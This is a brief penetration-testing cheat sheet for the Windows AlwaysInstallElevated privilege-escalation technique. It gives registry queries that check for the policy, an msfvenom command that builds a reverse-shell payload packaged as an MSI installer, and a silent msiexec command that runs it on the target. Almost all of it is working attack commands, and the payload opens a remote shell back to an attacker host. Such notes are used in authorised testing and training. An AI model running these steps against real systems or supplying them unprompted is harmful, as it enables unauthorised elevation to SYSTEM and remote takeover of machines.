# AlwaysInstalledElevated * Watch out for `AlwaysInstalledElevated` keys inside the registry via ```sh reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated ``` * Prepare reverse shell on attacker as an msi file ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o shell.msi ``` * start the msi on target ```sh msiexec /quiet /qn /i C:\shell.msi ```